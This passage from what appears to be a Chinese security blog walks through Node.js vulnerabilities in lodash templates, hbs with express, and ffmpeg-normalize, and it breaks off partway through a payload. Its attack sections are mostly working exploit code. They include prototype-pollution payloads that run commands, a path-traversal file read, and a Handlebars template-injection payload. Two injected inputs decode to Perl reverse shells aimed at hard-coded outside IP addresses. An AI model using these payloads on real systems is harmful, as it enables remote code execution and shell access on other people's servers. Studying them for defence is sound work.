<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">name = <span class="built_in">this</span>.process.mainModule.<span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&#x27;echo 123&gt;&gt;HELLO&#x27;</span>),_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="keyword">var</span> __t,__p=<span class="string">&#x27;&#x27;</span>,__j=<span class="built_in">Array</span>.prototype.join,print=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;__p+=__j.call(<span class="built_in">arguments</span>,<span class="string">&#x27;&#x27;</span>);&#125;;</span><br><span class="line">__p+=<span class="string">&#x27; &#x27;</span>+</span><br><span class="line">((__t=( name ))==<span class="literal">null</span>?<span class="string">&#x27;&#x27;</span>:__t)+</span><br><span class="line"><span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">return</span> __p;</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>



<p>有参数：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">name = <span class="built_in">this</span>.process.mainModule.<span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&#x27;echo 123&gt;&gt;HELLO&#x27;</span>),_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="keyword">var</span> __t,__p=<span class="string">&#x27;&#x27;</span>,__j=<span class="built_in">Array</span>.prototype.join,print=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;__p+=__j.call(<span class="built_in">arguments</span>,<span class="string">&#x27;&#x27;</span>);&#125;;</span><br><span class="line">__p+=<span class="string">&#x27; &#x27;</span>+</span><br><span class="line">((__t=( name ))==<span class="literal">null</span>?<span class="string">&#x27;&#x27;</span>:__t)+</span><br><span class="line"><span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">return</span> __p;</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>



<p>两者生成的参数是一样的，问题就在于若输入参数了，name就不再是我们设置的默认值，这样的话就会导致参数不再受控制。</p>
<p><img src="image-20210624165310430.png" alt="image-20210624165310430"></p>
<p>怪不得这个漏洞只有5.5分，这个的利用条件过于苛刻了,先不说哪个开发人员没事会用这个函数 ，又只会在很少的情况下出现定义了模板却不赋值的情况</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> obj = &#123;&#125;</span><br><span class="line"><span class="comment">// obj.__proto__.variable = &quot;epithet = this.process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;touch HELLO&#x27;))&#123; console.log(123); &#125;//&quot;;</span></span><br><span class="line">obj.__proto__.variable = <span class="string">&quot;name = this.process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;echo 123&gt;&gt;HELLO&#x27;)&quot;</span>;</span><br><span class="line"><span class="keyword">var</span> compiled = _.template(<span class="string">&quot; &lt;%= name %&gt;&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> a; <span class="comment">// 假设a为从数据库中打出来的值,并没有搜索到值返回了一个空值的情况下才有可能诞生漏洞。</span></span><br><span class="line"><span class="keyword">var</span> c = compiled(a);</span><br><span class="line"><span class="built_in">console</span>.log(c);</span><br></pre></td></tr></table></figure>



<h1 id="6-hbs框架与express的缺陷"><a href="#6-hbs框架与express的缺陷" class="headerlink" title="6. hbs框架与express的缺陷"></a>6. hbs框架与express的缺陷</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.shoebpatel.com&#x2F;2021&#x2F;01&#x2F;23&#x2F;The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps&#x2F;</span><br></pre></td></tr></table></figure>



<p>这是express的天生的问题了</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">router.get(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line"> 	res.render(<span class="string">&#x27;index&#x27;</span>)</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">	<span class="keyword">var</span> profile = req.body.profile</span><br><span class="line"> 	res.render(<span class="string">&#x27;index&#x27;</span>, profile)</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = router;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>看这两行代码，感觉是不是毫无缺陷？但是却会造成很严重的后果，打开DEBUG模式跟着调，我们可以很明显的发现我们的第二段输入被设计到了options当中</p>
<p><img src="image-20210624203415511.png" alt="image-20210624203415511"></p>
<p>和ejs一样，我们快进到 tryRender函数里，这里用的hbs框架，所以就会自动的切进去之后会进入一长串的缓存处理当中，可以忽略不计，直到这一行</p>
<p><img src="image-20210624203728753.png" alt="image-20210624203728753"></p>
<p>我们发现options又被原封不动的导入进来了在144行当中又取了options的layout</p>
<p><img src="image-20210624203815875.png" alt="image-20210624203815875"></p>
<p>之后就直接的取出layout中的路径</p>
<p><img src="image-20210624204005095.png" alt="image-20210624204005095"></p>
<p>当能够读取到东西的时候，调用 tryReadFileAndCache函数。</p>
<p><img src="image-20210624204109775.png" alt="image-20210624204109775"></p>
<p>读取文件，再之后就直接</p>
<p><img src="image-20210624204208342.png" alt="image-20210624204208342"></p>
<p>把layout直接渲染上去了，造成了任意文件读取。</p>
<p>总结：</p>
<p>​    其实造成这样的问题有两个</p>
<ul>
<li>express的渲染机制问题，express会毫无条件的接收所有的东西，并允许这些插件进行互相的调用</li>
<li>开发者不应该接收全部的参数，而应该选择的进行接收，但是，例如这样子来写：</li>
</ul>
<p><img src="image-20210624204736513.png" alt="image-20210624204736513"></p>
<p>但是即使是这样的操作，也依然可能导致被读取文件，因为可以进行原型链的污染。这样子会导致用户每次渲染参数都会导致被读取任意文件！</p>
<p>poc:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">router.post(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">	<span class="keyword">var</span> obj = &#123;&#125;</span><br><span class="line">	obj.__proto__.layout = <span class="string">&quot;../../../../../../../../flag.txt&quot;</span></span><br><span class="line">	<span class="built_in">console</span>.log([].layout);</span><br><span class="line">	<span class="keyword">var</span> profile = req.body.profile</span><br><span class="line"> 	res.render(<span class="string">&#x27;index&#x27;</span>, &#123;profile&#125;)</span><br><span class="line">&#125;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<p><img src="image-20210624205016453.png" alt="image-20210624205016453"></p>
<p>但是仅仅是任意文件读取并不能兄弟满足，如果我们可以RCE就更好了。</p>
<p>RCE文章</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.z3ratu1.cn&#x2F;%5BXCTF%5D%E5%8D%8E%E4%B8%BA%E7%AC%AC%E4%B8%89%E5%9C%BA.html</span><br></pre></td></tr></table></figure>



<p>RCE的前提：</p>
<ul>
<li><p>hbs的版本 低于 4.0.3</p>
<ul>
<li>能够上传带有后缀的文件(不是hbs结尾的也完全没问题)</li>
</ul>
</li>
</ul>
<p>上传文件1.jpg：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">&#123;% raw %&#125;</span></span><br><span class="line"><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> <span class="string">&quot;s&quot;</span> <span class="keyword">as</span> |string|&#125;&#125;</span></span><br><span class="line"><span class="xml">  </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> <span class="string">&quot;e&quot;</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">    </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> split <span class="keyword">as</span> |conslist|&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.push</span> (<span class="name"><span class="builtin-name">lookup</span></span> string.sub <span class="string">&quot;constructor&quot;</span>)&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> string.split <span class="keyword">as</span> |codelist|&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-variable">&#123;&#123;<span class="name">this.push</span> <span class="string">&quot;return process.mainModule.require(&#x27;child_process&#x27;).exec(&#x27;echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iODEuNjkuMjAxLjY1IjskcD0xMjM0O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Oyc=|base64 -d|bash&#x27;);&quot;</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">each</span></span> conslist&#125;&#125;</span></span><br><span class="line"><span class="xml">          </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> (<span class="name">string.sub.apply</span> <span class="number">0</span> codelist)&#125;&#125;</span></span><br><span class="line"><span class="xml">            </span><span class="template-variable">&#123;&#123;<span class="name">this</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">          </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">        </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">each</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">    </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">  </span><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="template-tag">&#123;&#123;/<span class="name"><span class="builtin-name">with</span></span>&#125;&#125;</span></span><br><span class="line"><span class="xml">&#123;% endraw %&#125;</span></span><br></pre></td></tr></table></figure>

<p>回到</p>
<p><img src="image-20210624210219027.png" alt="image-20210624210219027"></p>
<p>成功getshell！！</p>
<p><img src="image-20210624210233392.png" alt="image-20210624210233392"></p>
<h1 id="7-ffmpeg-normalize"><a href="#7-ffmpeg-normalize" class="headerlink" title="7.ffmpeg-normalize"></a>7.ffmpeg-normalize</h1><p>版本：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">&quot;name&quot;</span>: <span class="string">&quot;test&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;version&quot;</span>: <span class="string">&quot;1.0.0&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;description&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;main&quot;</span>: <span class="string">&quot;index.js&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;scripts&quot;</span>: &#123;</span><br><span class="line">    <span class="attr">&quot;test&quot;</span>: <span class="string">&quot;echo \&quot;Error: no test specified\&quot; &amp;&amp; exit 1&quot;</span></span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="attr">&quot;keywords&quot;</span>: [],</span><br><span class="line">  <span class="attr">&quot;author&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;license&quot;</span>: <span class="string">&quot;ISC&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;dependencies&quot;</span>: &#123;</span><br><span class="line">    <span class="attr">&quot;ffmpeg-normalize&quot;</span>: <span class="string">&quot;^1.8.0&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>该库是用于处理音频的，可以将我们的音频的声音大小统一（？）我不是很懂，官方给出的使用范例：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> normalize = <span class="built_in">require</span>(<span class="string">&#x27;ffmpeg-normalize&#x27;</span>);</span><br><span class="line"> </span><br><span class="line">normalize(&#123;</span><br><span class="line">    input: <span class="string">&#x27;input.mp4&#x27;</span>,</span><br><span class="line">    output: <span class="string">&#x27;output.mp4&#x27;</span>,</span><br><span class="line">    loudness: &#123;</span><br><span class="line">        normalization: <span class="string">&#x27;ebuR128&#x27;</span>,</span><br><span class="line">        target:</span><br><span class="line">        &#123;</span><br><span class="line">            input_i: -<span class="number">23</span>,</span><br><span class="line">            input_lra: <span class="number">7.0</span>,</span><br><span class="line">            input_tp: -<span class="number">2.0</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    verbose: <span class="literal">true</span></span><br><span class="line">&#125;)</span><br><span class="line">.then(<span class="function"><span class="params">normalized</span>  =&gt;</span> &#123;</span><br><span class="line">    <span class="comment">// Normalized</span></span><br><span class="line">&#125;)</span><br><span class="line">.catch(<span class="function"><span class="params">error</span> =&gt;</span> &#123;</span><br><span class="line">    <span class="comment">// Some error happened</span></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>



<p>漏洞产生于input模块，poc：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// poc.js</span></span><br><span class="line"><span class="keyword">const</span> normalize = <span class="built_in">require</span>(<span class="string">&#x27;ffmpeg-normalize&#x27;</span>);</span><br><span class="line"> </span><br><span class="line">normalize(&#123;</span><br><span class="line">    input: <span class="string">&#x27;input.mp4; touch HACKED; #&#x27;</span>,</span><br><span class="line">    output: <span class="string">&#x27;output.mp4&#x27;</span>,</span><br><span class="line">    loudness: &#123;</span><br><span class="line">        normalization: <span class="string">&#x27;ebuR128&#x27;</span>,</span><br><span class="line">        target: &#123;<span class="attr">input_i</span>: -<span class="number">23</span>&#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    verbose: <span class="literal">false</span></span><br><span class="line">&#125;).then(<span class="function"><span class="params">normalized</span>  =&gt;</span> &#123;&#125;).catch(<span class="function"><span class="params">error</span> =&gt;</span> &#123;<span class="built_in">console</span>.log()&#125;);</span><br></pre></td></tr></table></figure>

<p>老样子，在input这里打个断点，函数还是短的，过了几步就看见：</p>
<p><img src="image-20210625202510490.png" alt="image-20210625202510490"></p>
<p><img src="/image-20210625203237131.png" alt="image-20210625203237131"></p>
<p>还就那个执行。</p>
<p><img src="image-20210625203416754.png" alt="image-20210625203416754"></p>
<p><img src="image-20210625203424292.png" alt="image-20210625203424292"></p>
<p>直接命令拼接然后执行了，那是真的简单</p>
<p><img src="image-20210625203511035.png" alt="image-20210625203511035"></p>
<p>所以我们只需要用冒号，然后扣任意代码，之后用#号省略后面的即可！</p>
<p>感觉很多npm的开发人员都是没有什么安全意识，直接拼接命令然后exec。</p>
<p>随手弹个shell</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> normalize = <span class="built_in">require</span>(<span class="string">&#x27;ffmpeg-normalize&#x27;</span>);</span><br><span class="line"> </span><br><span class="line">normalize(&#123;</span><br><span class="line">    input: <span class="string">&#x27;input.mp4;echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMS4xNS4yMjQuMTE0IjskcD0xMjM0O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Oyc=|base64 -d|bash #&#x27;</span>,</span><br><span class="line">    output: <span class="string">&#x27;output.mp4&#x27;</span>,</span><br><span class="line">    loudness: &#123;</span><br><span class="line">        normalization: <span class="string">&#x27;ebuR128&#x27;</span>,</span><br><span class="line">        target: &#123;<span class="attr">input_i</span>: -<span class="number">23</span>&#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    verbose: <span class="literal">false</span></span><br><span class="line">&#125;).then(<span class="function"><span class="params">normalized</span>  =&gt;</span> &#123;&#125;).catch(<span class="function"><span class="params">error</span> =&gt;</span> &#123;<span class="built_in">console</span>.log(<span class="number">123</span>)&#125;);</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>





<p><img src="image-20210625203828877.png" alt="image-20210625203828877"></p>
<h1 id="8-prisma"><a href="#8-prisma" class="headerlink" title="8.prisma"></a>8.prisma</h1><p>这是一个用于管理数据库连接的第三方库</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Data source</span></span><br><span class="line">datasource db &#123;</span><br><span class="line">  provider = <span class="string">&quot;postgresql&quot;</span></span><br><span class="line">  url      = env(<span class="string">&quot;DATABASE_URL&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Generator</span></span><br><span class="line">generator client &#123;</span><br><span class="line">  provider = <span class="string">&quot;prisma-client-js&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Data model</span></span><br><span class="line">model Post &#123;</span><br><span class="line">  id        Int     @id @<span class="keyword">default</span>(autoincrement())</span><br><span class="line">  title     <span class="built_in">String</span></span><br><span class="line">  content   <span class="built_in">String</span>?</span><br><span class="line">  published <span class="built_in">Boolean</span> @<span class="keyword">default</span>(<span class="literal">false</span>)</span><br><span class="line">  author    User?   @relation(fields:  [authorId], <span class="attr">references</span>: [id])</span><br><span class="line">  authorId  Int?</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">model User &#123;</span><br><span class="line">  id    Int     @id @<span class="keyword">default</span>(autoincrement())</span><br><span class="line">  email <span class="built_in">String</span>  @unique</span><br><span class="line">  name  <span class="built_in">String</span>?</span><br><span class="line">  posts Post[]</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h1 id="9-关于hbs还就那个踩坑"><a href="#9-关于hbs还就那个踩坑" class="headerlink" title="9. 关于hbs还就那个踩坑"></a>9. 关于hbs还就那个踩坑</h1><p>卷土重来之审计hbs的渲染完整流程。</p>
<p>原本是在做出上面的研究之后想自己搭建一个题目，结果还就疯狂踩坑人了。我真是个大啥比,码的.我在搭环境的时候遇见了一个坑:</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm install 有时候并不会根据你得package里面的版本走,你可能需要去node_module确认一下</span><br></pre></td></tr></table></figure>

<p>我在写这篇文章的时候就因为上当了,</p>
<p><img src="image-20210627172914274.png" alt="image-20210627172914274"></p>
<p>这里明明给我写的4.0.1,但是实际上进去包里的时候却是4.1.2. 导致payload一直打不通…(为此我一直开着debug模式对着hbs的渲染盯了两天,脑袋都要炸球了),最后终于折腾好了,我们可以想象一个场景.如果我们找到一个用hbs网站处于4.1以下的版本，并且是express，之后如果满足如下两个条件就可以RCE了</p>
<ul>
<li>原型链污染</li>
<li>没有严格的取输出</li>
</ul>
<h2 id="原型链污染"><a href="#原型链污染" class="headerlink" title="原型链污染"></a>原型链污染</h2><p>原型链污染的情况，举例（这里我用了PWN2WIN的源码修改了修改来用），核心在这里：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">app.get(<span class="string">&quot;/&quot;</span>, <span class="keyword">async</span> (req, res) =&gt; &#123;</span><br><span class="line">    res.render(<span class="string">&quot;index&quot;</span>, &#123;services&#125;)   </span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="comment">// API</span></span><br><span class="line">app.post(<span class="string">&quot;/change_status&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> patch = []</span><br><span class="line"></span><br><span class="line">    <span class="built_in">Object</span>.entries(req.body).forEach(<span class="function">(<span class="params">[service, status]</span>) =&gt;</span> &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (service === <span class="string">&quot;status&quot;</span>)&#123;</span><br><span class="line">            res.status(<span class="number">400</span>).end(<span class="string">&quot;Cannot change all services status&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        patch.push(&#123;</span><br><span class="line">            <span class="string">&quot;op&quot;</span>: <span class="string">&quot;replace&quot;</span>,</span><br><span class="line">            <span class="string">&quot;path&quot;</span>: <span class="string">&quot;/&quot;</span> + service,</span><br><span class="line">            <span class="string">&quot;value&quot;</span>: status</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;);</span><br><span class="line">    </span><br><span class="line">    jsonpatch.applyPatch(services, patch)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&quot;offline&quot;</span> <span class="keyword">in</span> <span class="built_in">Object</span>.values(services))&#123;</span><br><span class="line">        services.status = <span class="string">&quot;offline&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    res.json(services)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="comment">// TEST</span></span><br><span class="line">app.post(<span class="string">&#x27;/upload&#x27;</span>, upload.single(<span class="string">&#x27;file&#x27;</span>), <span class="function"><span class="keyword">function</span>(<span class="params">req, res, next</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">var</span> file = req.file;</span><br><span class="line">    res.send(&#123;<span class="attr">ret_code</span>: <span class="string">&#x27;0&#x27;</span>,<span class="string">&quot;filename&quot;</span>:file.path&#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>因为jsonpatch这个是存在原型链污染漏洞的，所以可以这样来污染layout属性</p>
<p><img src="image-20210627174535517.png" alt="image-20210627174535517"></p>
<p>这样子可以读取任意文件，并且如果存在文件上传(这里的文件不拘泥于任何后缀都可以被成功编译)，上传如下恶意文件。</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">&#123;% raw %&#125;</span></span><br><span class="line"><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> <span class="string">&quot;s&quot;</span> <span class="keyword">as</span> |string|&#125;&#125;</span></span><br><span class="line"><span class="xml">  </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> <span class="string">&quot;e&quot;</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">    </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> split <span class="keyword">as</span> |conslist|&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.push</span> (<span class="name"><span class="builtin-name">lookup</span></span> string.sub <span class="string">&quot;constructor&quot;</span>)&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-variable">&#123;&#123;<span class="name">this.pop</span>&#125;&#125;</span></span><br><span class="line"><span class="xml">      </span><span class="template-tag">&#123;&#123;#<span class="name"><span class="builtin-name">with</span></span> string.split <span class="keyword">as</span> |codelist|&#125;&#125;</span></span><br><span class="line"><span class="xml">        